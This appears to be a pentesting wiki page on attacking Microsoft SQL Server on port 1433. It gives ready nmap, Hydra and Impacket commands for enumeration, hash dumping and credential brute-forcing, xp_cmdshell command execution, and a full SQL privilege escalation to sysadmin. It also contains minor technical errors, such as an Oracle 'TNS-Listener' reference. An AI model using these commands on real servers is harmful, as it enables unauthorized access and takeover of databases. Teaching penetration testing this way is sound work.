Infiltr8ForumGitHub

MSSQL

Pentesting MSSQL - TCP Port 1433

Theory

Microsoft SQL Server (MSSQL) is a relational database management system developed by Microsoft. By default, it runs on port TCP 1433

Default MS-SQL System Tables:

  • master Database: Records all the system-level information for an instance of SQL Server.

  • msdb Database: Is used by SQL Server Agent for scheduling alerts and jobs.

  • model Database: Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.

  • Resource Databas: Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.

  • tempdb Database : Is a work-space for holding temporary objects or intermediate result sets.

Practice

Enumerate

Using nmap scripts, we can enumerate the version of the TNS-Listener

# Usefull Scipts
nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script ms-sql-* -p 1433 <target-ip>

# Run all Scripts
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

Enumerate DB Objects

To enumerate Databases, Tables, Columns, Users, Permissions, refers to the following page

Enum Databases

Brute Force Credentials

If you don't have credentials you can try to guess them. You can use nmap or metasploit. Be careful, you can block accounts if you fail login several times using an existing username.

Using Hydra, we may bruteforce MSSQL credentials.

hydra -L usernames.txt –p password <target-ip> mssql
hydra -l username –P passwords.txt <target-ip> mssql

Sign-in

Using mssqlclient from Impacket, we can login to an MSSQL instance.

#Classic login
mssqlclient.py -port 1433 DOMAIN/username:password@<target-ip>

#Use Windows Authentication (forces NTLM authentication)
mssqlclient.py -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

#Use Kerberos
mssqlclient.py -k DC1.DOMAIN.LOCAL

Remote Code Execution

Using mssqlclient from Impacket, we may be able to execute code.

# Enable xp_cmdshell
SQL (dbo@master)> enable_xp_cmdshell

# Execute command
SQL (dbo@master)> xp_cmdshell whoami

To directly execute or read/write files on a MSSQL instance, check the following page:

Read/Write/Execute

Coerced Auths (Stealing NTLM Hash)

On MS-SQL (Microsoft SQL) servers, the EXEC method can be used to access a remote SMB share. MSSQL uses Keberos to authenticate users so we can retrieve the NTLM hash.

Living off the land

MSSQL Privilege Escalation

If a regular user is given the role db_owner over the database owned by an admin user (such as sa) and that database is configured as trustworthy, that user can abuse these privileges to privesc because stored procedures created in there that can execute as the owner (admin).

To enumerate, run the following queries

# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases

# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

If you found you are db_owner of a trustworthy database, you can privesc

--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>

CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'

--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me

--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')

Otherwise, we can use Invoke-SqlServerDbElevateDbOwner powershell script to automate the exploit

Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184

Local Privilege Escalation

The user running MSSQL server will have enabled the privilege token SeImpersonatePrivilege. You probably will be able to escalate to Administrator or NT AUTHORITY\SYSTEM following this page:

Abusing Tokens

Resources

LogoMSSQL (Microsoft SQL) Pentesting | Exploit Noteshideckies
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-servebook.hacktricks.xyz

Last updated